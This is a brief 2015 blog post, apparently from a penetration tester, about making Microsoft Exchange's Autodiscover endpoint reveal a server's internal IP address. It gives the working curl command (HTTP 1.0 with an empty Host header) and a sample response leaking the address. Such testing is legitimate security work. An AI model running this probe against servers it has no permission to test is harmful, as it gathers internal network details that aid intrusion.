Tuesday, August 25, 2015

Testing for Microsoft Exchange Autodiscover Internal IP Disclosure

So it turns out that if you request your targets autodiscover xml file without specifying a host, it will put in its internal IP into the "Realm" response header. One important thing that people done seem to mention is that you need to request the xml file using HTTP 1.0 not the default of 1.1. Below is the curl line i tend to use to test for it:
curl -i -k https://targetip/autodiscover/autodiscover.xml -0 -H "Host:"
HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-SOAP-Enabled: True
X-WSSecurity-Enabled: True
X-WSSecurity-For: None
X-AspNet-Version: 2.0.50727
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
WWW-Authenticate: Basic realm="192.168.50.30"
X-Powered-By: ASP.NET
Connection: close
Content-Length: 58
If you exclude the -0 (to use http 1.0) you will get a 400 bad request.
If your request includes something in the Host header, the server will place that in the Realm header instead of the internal IP.

No comments:

Post a Comment